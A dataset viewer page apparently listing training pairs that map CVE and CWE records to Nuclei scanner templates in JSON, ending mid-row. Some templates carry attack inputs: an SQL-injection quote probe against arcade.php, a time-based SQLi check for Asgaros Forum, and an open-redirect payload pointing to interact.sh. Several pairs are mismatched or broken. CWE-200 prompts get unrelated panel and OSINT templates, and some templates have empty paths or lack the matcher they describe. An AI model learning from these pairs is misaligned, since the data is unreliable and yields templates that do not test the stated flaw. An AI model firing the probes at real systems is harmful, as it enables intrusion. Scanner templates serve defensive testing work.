Dataset Viewer
Auto-converted to Parquet Duplicate
id
stringlengths
5
53
prompt
stringlengths
1.49k
6.97k
completion
stringlengths
924
11.2M
CVE-2021-24827
[CANONICAL_RECORD] { "cve_id": "CVE-2021-24827", "summary": "The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue", "affected_products": [ { "vendor": "asgaros", "product": "asgaros_forum", "version_range": "< 1.15.13" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "critical" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2022-42475", "severity": "critical", "tags": [ "cve", "cve2024", "ssl-vpn", "vpn", "fortios", "fortigate", "heap-based", "bufferoverflow", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/remote/login", "{{BaseURL}}/login" ], "matcher_types": [ "dsl" ] } ] }, { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2020-0646", "severity": "critical", "tags": [ "cve", "cve2020", "net-framework", "sharepoint", "microsoft", "packetstorm", "rce", "kev", "oast", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum", "snippet": "PoC available at https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum" }, { "source": "nvd", "url": "https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1", "snippet": "PoC available at https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1" }, { "source": "nvd", "url": "https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum", "snippet": "PoC available at https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum" }, { "source": "nvd", "url": "https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1", "snippet": "PoC available at https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2021-24827", "info": { "name": "WordPress Asgaros Forum <1.15.13 - SQL Injection", "author": "theamanrawat", "severity": "critical", "description": "WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n", "tags": [ "time-based-sqli", "cve2021", "cve", "wp-plugin", "asgaros-forum", "unauth", "wpscan", "wordpress", "wp", "sqli", "asgaros", "vkev", "vuln" ], "reference": [ "https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1", "https://wordpress.org/plugins/asgaros-forum/", "https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum", "https://nvd.nist.gov/vuln/detail/CVE-2021-24827", "https://github.com/20142995/sectool" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "dsl", "dsl": [ "duration>=6", "status_code == 200", "contains(content_type, \"text/html\")", "contains(body, \"asgarosforum\")" ], "condition": "and" } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2021-24827", "timestamp": "2025-11-13T15:15:42.946344Z" } }
wordpress-one-click-demo-import
[CANONICAL_RECORD] { "cve_id": "wordpress-one-click-demo-import", "summary": "One Click Demo Import Detection. This template detects One Click Demo Import Detection by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" ], "indicators": [ "One Click Demo Import Detection", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "wordpress-one-click-demo-import", "info": { "name": "One Click Demo Import Detection", "author": "ricardomaia", "severity": "info", "description": "One Click Demo Import Detection", "tags": [ "tech", "wordpress", "wp-plugin", "top-100", "top-200", "discovery" ], "reference": [ "https://wordpress.org/plugins/one-click-demo-import/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" ], "matchers": [ { "type": "dsl", "dsl": [ "compare_versions(internal_detected_version, concat(\"< \", last_version))" ] }, { "type": "regex", "part": "body", "regex": [ "(?i)Stable.tag:\\s?([\\w.]+)" ] } ], "matchers_condition": "or" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-wordpress-one-click-demo-import", "timestamp": "2025-11-13T15:15:53.862799Z" } }
CVE-2018-8715
[CANONICAL_RECORD] { "cve_id": "CVE-2018-8715", "summary": "The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.", "affected_products": [ { "vendor": "embedthis", "product": "appweb", "version_range": "<= 7.0.2" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2022-42475", "severity": "critical", "tags": [ "cve", "cve2024", "ssl-vpn", "vpn", "fortios", "fortigate", "heap-based", "bufferoverflow", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/remote/login", "{{BaseURL}}/login" ], "matcher_types": [ "dsl" ] } ] }, { "id": "cve-2023-49105", "severity": "critical", "tags": [ "cve", "cve2023", "code", "owncloud", "auth-bypass", "vuln" ], "requests": [ { "method": "GET", "paths": [], "matcher_types": [ "dsl", "word" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://blogs.securiteam.com/index.php/archives/3676", "snippet": "PoC available at https://blogs.securiteam.com/index.php/archives/3676" }, { "source": "nvd", "url": "https://github.com/embedthis/appweb/issues/610", "snippet": "PoC available at https://github.com/embedthis/appweb/issues/610" }, { "source": "nvd", "url": "https://blogs.securiteam.com/index.php/archives/3676", "snippet": "PoC available at https://blogs.securiteam.com/index.php/archives/3676" }, { "source": "nvd", "url": "https://github.com/embedthis/appweb/issues/610", "snippet": "PoC available at https://github.com/embedthis/appweb/issues/610" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2018-8715", "info": { "name": "AppWeb - Authentication Bypass", "author": "milo2012", "severity": "high", "description": "The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.", "tags": [ "cve", "cve2018", "appweb", "auth-bypass", "embedthis", "vuln" ], "reference": [ "https://github.com/embedthis/appweb/issues/610", "https://blogs.securiteam.com/index.php/archives/3676", "https://security.paloaltonetworks.com/CVE-2018-8715", "https://nvd.nist.gov/vuln/detail/CVE-2018-8715", "https://github.com/cyberharsh/appweb" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "word", "part": "body", "words": [ "<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2018-8715", "timestamp": "2025-11-13T15:15:41.573501Z" } }
unauth-zwave-mqtt
[CANONICAL_RECORD] { "cve_id": "unauth-zwave-mqtt", "summary": "ZWave To MQTT Console is exposed.. This template detects Unauthenticated ZWave To MQTT Console by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "ZWave To MQTT", "content=\"Zwavejs2Mqtt\"" ], "severity_hint": "low" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-auditing-disable", "severity": "low", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "unauth-zwave-mqtt", "info": { "name": "Unauthenticated ZWave To MQTT Console", "author": "geeknik", "severity": "low", "description": "ZWave To MQTT Console is exposed.", "tags": [ "misconfig", "zwave", "mqtt", "unauth", "vuln" ], "reference": [ "https://github.com/OpenZWave/Zwave2Mqtt" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "word", "words": [ "ZWave To MQTT", "content=\"Zwavejs2Mqtt\"" ], "condition": "and" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-unauth-zwave-mqtt", "timestamp": "2025-11-13T15:15:51.425583Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "dmarc-detect", "severity": "info", "tags": [ "dns", "dmarc", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "pulsar-adminui-panel", "info": { "name": "Pulsar Admin UI Panel - Detect", "author": "ritikchaddha", "severity": "info", "description": "Pulsar admin UI panel was detected.", "tags": [ "panel", "pulsar", "pulsarui", "admin", "apache", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/#/login?redirect=%2F" ], "matchers": [ { "type": "word", "part": "body", "words": [ "Pulsar Admin UI" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-pulsar-adminui-panel", "timestamp": "2025-11-13T15:15:49.093283Z" } }
arcade-php-sqli
[CANONICAL_RECORD] { "cve_id": "arcade-php-sqli", "summary": "The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.\n", "affected_products": [], "paths": [ "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'" ], "indicators": [ "mySQL query error" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "arcade-php-sqli", "info": { "name": "Arcade.php - SQL Injection", "author": "MaStErChO", "severity": "high", "description": "The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.\n", "tags": [ "arcade", "php", "vbulletin", "sqli", "vuln" ], "reference": [ "https://www.exploit-db.com/exploits/29604", "https://github.com/OWASP/vbscan/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'" ], "matchers": [ { "type": "word", "part": "body", "words": [ "mySQL query error" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "max_redirects": 3 } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-arcade-php-sqli", "timestamp": "2025-11-13T15:16:07.622869Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "detect-dangling-cname", "severity": "info", "tags": [ "dns", "takeover", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "gradle-cache-node-detect", "info": { "name": "Gradle Enterprise Build Cache Node Login Panel - Detect", "author": "Adam Crosser,righettod", "severity": "info", "description": "Gradle Enterprise Build Cache Node login panel was detected.", "tags": [ "panel", "gradle", "detect", "discovery" ], "reference": [ "https://gradle.com/gradle-enterprise-solutions/build-cache/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "dsl", "dsl": [ "status_code == 200 || status_code == 401", "contains_any(to_lower(body), \"gradle enterprise build cache node\", \"com.gradle.error.fallback\")" ], "condition": "and" } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-gradle-cache-node-detect", "timestamp": "2025-11-13T15:15:48.554405Z" } }
slack-config-refresh-token
[CANONICAL_RECORD] { "cve_id": "slack-config-refresh-token", "summary": "Slack Config Refresh Token. This template detects Slack Config Refresh Token by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "Slack Config Refresh Token", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "slack-config-refresh-token", "info": { "name": "Slack Config Refresh Token", "author": "DhiyaneshDK", "severity": "info", "description": "Slack Config Refresh Token", "tags": [ "exposure", "token", "slack", "vuln" ], "reference": [ "https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/slack-config-refresh-token.txt", "https://github.com/semgrep/semgrep-rules/blob/develop/generic/secrets/gitleaks/slack-config-refresh-token.yaml", "https://api.slack.com/authentication" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-slack-config-refresh-token", "timestamp": "2025-11-13T15:15:50.301078Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "detect-dangling-cname", "severity": "info", "tags": [ "dns", "takeover", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dmarc-detect", "severity": "info", "tags": [ "dns", "dmarc", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "steam", "info": { "name": "Steam User Name Information - Detect", "author": "dwisiswant0", "severity": "info", "description": "Steam user name information check was conducted.", "tags": [ "osint", "osint-gaming", "steam", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "https://steamcommunity.com/id/{{user}}" ], "matchers": [ { "type": "status", "status": [ 200 ] }, { "type": "word", "part": "body", "words": [ "g_rgProfileData =" ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-steam", "timestamp": "2025-11-13T15:15:52.165217Z" } }
hp-ftp-detect
[CANONICAL_RECORD] { "cve_id": "hp-ftp-detect", "summary": "Hewlett-Packard FTP service was detected.. This template detects Hewlett-Packard FTP Service - Detect by checking specific patterns and responses.", "affected_products": [], "paths": [], "indicators": [ "Hewlett-Packard FTP Service - Detect", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "hp-ftp-detect", "info": { "name": "Hewlett-Packard FTP Service - Detect", "author": "pussycat0x", "severity": "info", "description": "Hewlett-Packard FTP service was detected.", "tags": [ "network", "ftp", "hp", "detect", "tcp", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "/" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-hp-ftp-detect", "timestamp": "2025-11-13T15:16:08.304742Z" } }
traefik-workflow
[CANONICAL_RECORD] { "cve_id": "traefik-workflow", "summary": "A simple workflow that runs all Traefik related nuclei templates on a given target.", "affected_products": [], "paths": [], "indicators": [ "Traefik Security Checks", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "aws-code-env", "severity": "info", "tags": [ "cloud", "devops", "aws", "amazone", "aws-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cloudfront-geo-restriction", "severity": "info", "tags": [ "cloud", "devops", "aws", "amazon", "cloudfront", "aws-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "traefik-workflow", "info": { "name": "Traefik Security Checks", "author": "daffainfo", "severity": "info", "description": "A simple workflow that runs all Traefik related nuclei templates on a given target.", "tags": [ "unknown" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "/" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-traefik-workflow", "timestamp": "2025-11-13T15:16:08.641541Z" } }
CWE-601
[CANONICAL_RECORD] { "cve_id": "CWE-601", "summary": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.", "affected_products": [], "paths": [], "indicators": [ "vulnerability detected", "error" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "icewarp-open-redirect", "info": { "name": "IceWarp - Open Redirect", "author": "uomogrande", "severity": "medium", "description": "IceWarp open redirect vulnerabilities were detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.", "tags": [ "icewarp", "redirect", "vuln" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}///interact.sh/%2F.." ], "matchers": [ { "type": "word", "part": "header", "words": [ "IceWarp" ] }, { "type": "regex", "part": "header", "regex": [ "(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$" ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-icewarp-open-redirect", "timestamp": "2025-11-13T15:16:07.202982Z" } }
CVE-2023-43325
[CANONICAL_RECORD] { "cve_id": "CVE-2023-43325", "summary": "A reflected cross-site scripting (XSS) vulnerability in the data[redirect_url] parameter of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL.", "affected_products": [ { "vendor": "moosocial", "product": "moosocial", "version_range": "*" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2023-2640", "severity": "high", "tags": [ "cve", "cve2023", "code", "packetstorm", "kernel", "ubuntu", "linux", "privesc", "local", "canonical", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2019-14287", "severity": "high", "tags": [ "packetstorm", "cve", "cve2019", "sudo", "code", "linux", "privesc", "local", "canonical", "sudo_project", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2021-3156", "severity": "high", "tags": [ "packetstorm", "cve", "cve2021", "sudo", "code", "linux", "privesc", "local", "kev", "sudo_project", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://github.com/ahrixia/CVE-2023-43325", "snippet": "PoC available at https://github.com/ahrixia/CVE-2023-43325" }, { "source": "nvd", "url": "https://github.com/ahrixia/CVE-2023-43325", "snippet": "PoC available at 